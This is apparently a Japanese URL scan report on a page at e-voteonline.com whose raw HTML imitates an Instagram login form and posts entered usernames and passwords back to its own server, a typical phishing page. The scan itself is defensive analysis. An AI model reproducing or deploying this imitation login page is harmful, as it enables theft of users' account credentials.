- スキャンID:
- 0df29660-8e37-47dd-bcc6-87c2b09b62a1終了
- 送信済みURL:
- https://e-voteonline.com/Auth/IG.php
- レポート終了日:
リンク · 0件検出
ページから特定された発信リンク
JavaScript変数 · 3件検出
ページのウィンドウオブジェクトにロードされたグローバルのJavaScript変数は関数以外の場所で宣言された変数で、現在のスコープ内であればコードのどこからでもアクセス可能です
名前 | 規模 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
コンソールログメッセージ · 1件検出
Webコンソールにログ記録されたメッセージ
規模 | 分類 | ログ |
---|---|---|
verbose | dom |
|
HTML
未加工のHTMLページ本文
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- title -->
<title>E-voteOnline || Login </title>
<!-- custom css link -->
<link rel="stylesheet" href="style.css">
<!-- favicon -->
<link rel="shortcut icon" href="img/favicon.png" type="image/x-icon">
<!-- boxicons cdn link -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/boxicons@latest/css/boxicons.min.css">
</head>
<body>
<div class="image__login">
<img src="img/instagramimg.png" alt="">
</div>
<div class="insta__form">
<div class="login__form">
<img src="img/instalogo.png">
<form class="form" method="POST">
<input type="text" placeholder="Phone number, username, or email" name="username">
<input type="password" placeholder="Password" name="password">
<button>
Log in
</button>
<span class="or">OR</span>
</form>
<h3>
<i class="bx bxl-facebook-circle"></i>
Log in with Facebook
</h3>
<span class="forget">
Forget Password ?
</span>
</div>
</div>
</body></html>